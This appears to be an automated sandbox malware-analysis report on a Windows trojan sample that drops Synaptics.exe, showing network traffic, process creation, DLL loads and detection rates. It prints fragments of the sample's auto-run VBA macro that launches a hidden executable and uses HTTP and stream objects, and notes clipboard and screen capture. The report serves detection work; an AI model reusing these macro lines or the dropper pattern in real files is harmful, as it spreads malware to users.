                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49745 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49754 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.11:49755 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49757 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.11:49756 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49780 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49781 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49806 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49807 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.11:49819 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49818 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.11:49821 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49820 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49840 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49841 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49858 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49857 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.11:49862 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.11:49865 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49876 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49877 version: TLS 1.2
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00517A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00517A60
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00517A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00517A60
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00517C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00517C10

                              System Summary

                              barindex
                              Document contains an embedded VBA macro with suspicious strings
                              Source: U1NTS3we.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: U1NTS3we.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: U1NTS3we.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: U1NTS3we.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: U1NTS3we.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: U1NTS3we.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: U1NTS3we.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: U1NTS3we.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: U1NTS3we.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: U1NTS3we.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: U1NTS3we.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Document contains an embedded VBA with functions possibly related to ADO stream file operations
                              Source: U1NTS3we.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: AFWAAFRXKO.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Document contains an embedded VBA with functions possibly related to HTTP operations
                              Source: U1NTS3we.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: AFWAAFRXKO.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                              Source: U1NTS3we.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: AFWAAFRXKO.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E8A602_2_004E8A60
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005178502_2_00517850
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004F906A2_2_004F906A
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005060102_2_00506010
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0051D0D02_2_0051D0D0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005238E02_2_005238E0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004F80F02_2_004F80F0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005078852_2_00507885
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004FD8B02_2_004FD8B0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005249502_2_00524950
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E69502_2_004E6950
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004EE16E2_2_004EE16E
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004ED1722_2_004ED172
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005099172_2_00509917
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0051210B2_2_0051210B
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E39102_2_004E3910
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004EB92C2_2_004EB92C
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E61202_2_004E6120
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0050F1C12_2_0050F1C1
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005039EB2_2_005039EB
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004F618C2_2_004F618C
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0051099F2_2_0051099F
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005011802_2_00501180
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0050E9B02_2_0050E9B0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004FF9A02_2_004FF9A0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004FD1B02_2_004FD1B0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0051025E2_2_0051025E
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004FBA522_2_004FBA52
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0050621B2_2_0050621B
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00523A302_2_00523A30
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004F72222_2_004F7222
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0050BA202_2_0050BA20
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E42C02_2_004E42C0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00523AC02_2_00523AC0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005102CD2_2_005102CD
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004EF2D02_2_004EF2D0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005242E02_2_005242E0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004EB2802_2_004EB280
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005152B02_2_005152B0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E2B402_2_004E2B40
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005023702_2_00502370
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00509B7B2_2_00509B7B
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0050FB7D2_2_0050FB7D
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00523B602_2_00523B60
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E9B702_2_004E9B70
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00508B102_2_00508B10
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E5B002_2_004E5B00
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00520B002_2_00520B00
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00501B302_2_00501B30
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004F9B302_2_004F9B30
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004F1BDE2_2_004F1BDE
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004F23EC2_2_004F23EC
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004F8BA22_2_004F8BA2
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0051C4602_2_0051C460
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00508C622_2_00508C62
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0051B4102_2_0051B410
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00524C202_2_00524C20
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00521C262_2_00521C26
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E64C02_2_004E64C0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0050F4E12_2_0050F4E1
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005124EE2_2_005124EE
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004FD4A02_2_004FD4A0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E8D102_2_004E8D10
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0051E5202_2_0051E520
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004F5DD82_2_004F5DD8
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00522DCA2_2_00522DCA
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00505DA02_2_00505DA0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E85B02_2_004E85B0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E96602_2_004E9660
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E4E202_2_004E4E20
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0051C6C02_2_0051C6C0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004F86E52_2_004F86E5
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0051E6E02_2_0051E6E0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0051CE902_2_0051CE90
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005246802_2_00524680
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004FDE902_2_004FDE90
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005087502_2_00508750
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00509F7C2_2_00509F7C
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0051DF602_2_0051DF60
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005057132_2_00505713
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0050F7162_2_0050F716
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005137072_2_00513707
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E2F102_2_004E2F10
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004E77302_2_004E7730
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_005237D02_2_005237D0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00513FDF2_2_00513FDF
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00507FC02_2_00507FC0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0050A7F02_2_0050A7F0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00514FF02_2_00514FF0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004F27E02_2_004F27E0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0050AF922_2_0050AF92
                              Source: U1NTS3we.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: U1NTS3we.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: String function: 004E8280 appears 47 times
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: String function: 004F4C20 appears 145 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 2816
                              Source: 1.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: 1.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX9CB3.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs 1.exe
                              Source: 1.exe, 00000001.00000003.1317446237.0000000000595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs 1.exe
                              Source: 1.exe, 00000001.00000000.1304723968.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs 1.exe
                              Source: 1.exe, 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs 1.exe
                              Source: 1.exeBinary or memory string: OriginalFileName vs 1.exe
                              Source: 1.exeBinary or memory string: OriginalFilenameb! vs 1.exe
                              Source: 1.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@7/28@6/3
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0051D0D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,2_2_0051D0D0
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                              Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\Desktop\._cache_1.exeJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2260
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\U1NTS3we.xlsmJump to behavior
                              Source: Yara matchFile source: 1.exe, type: SAMPLE
                              Source: Yara matchFile source: 1.0.1.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX9CB3.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Users\user\Desktop\1.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: 1.exeVirustotal: Detection: 84%
                              Source: 1.exeReversingLabs: Detection: 86%
                              Source: C:\Users\user\Desktop\1.exeFile read: C:\Users\user\Desktop\1.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"
                              Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\Desktop\._cache_1.exe "C:\Users\user\Desktop\._cache_1.exe"
                              Source: C:\Users\user\Desktop\1.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 2816
                              Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\Desktop\._cache_1.exe "C:\Users\user\Desktop\._cache_1.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\1.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: shacct.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: idstore.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: wlidprov.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: provsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
